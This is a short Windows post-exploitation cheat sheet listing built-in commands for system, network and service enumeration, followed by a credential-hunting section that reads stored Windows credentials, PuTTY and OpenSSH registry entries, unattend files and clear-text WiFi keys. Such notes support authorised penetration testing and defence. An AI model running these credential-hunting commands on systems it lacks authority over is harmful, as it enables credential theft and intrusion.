# System info without Seatbelt/WinPEAS
systeminfo # OS version, hotfixes, domain
wmic qfe list brief # installed patches
wmic product get name,version # installed software
wmic useraccount list brief # local users
wmic group list brief # local groups
net localgroup administrators # admin members
# Network info
ipconfig /all
netstat -ano
route print
arp -a
netsh advfirewall show allprofiles # firewall state
netsh wlan show profiles # saved WiFi networks (then: show key=clear)
# Service and process enumeration
sc query type= all state= all # all services
tasklist /svc # processes with service names
wmic service list brief # service details
reg query "HKLM\SYSTEM\CurrentControlSet\Services" # service registry
# Credential hunting
cmdkey /list # stored Windows credentials
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 2>nul # PuTTY saved sessions
reg query "HKLM\SOFTWARE\OpenSSH" 2>nul
dir /b /s C:\Users\*.xml 2>nul | findstr unattend # unattend files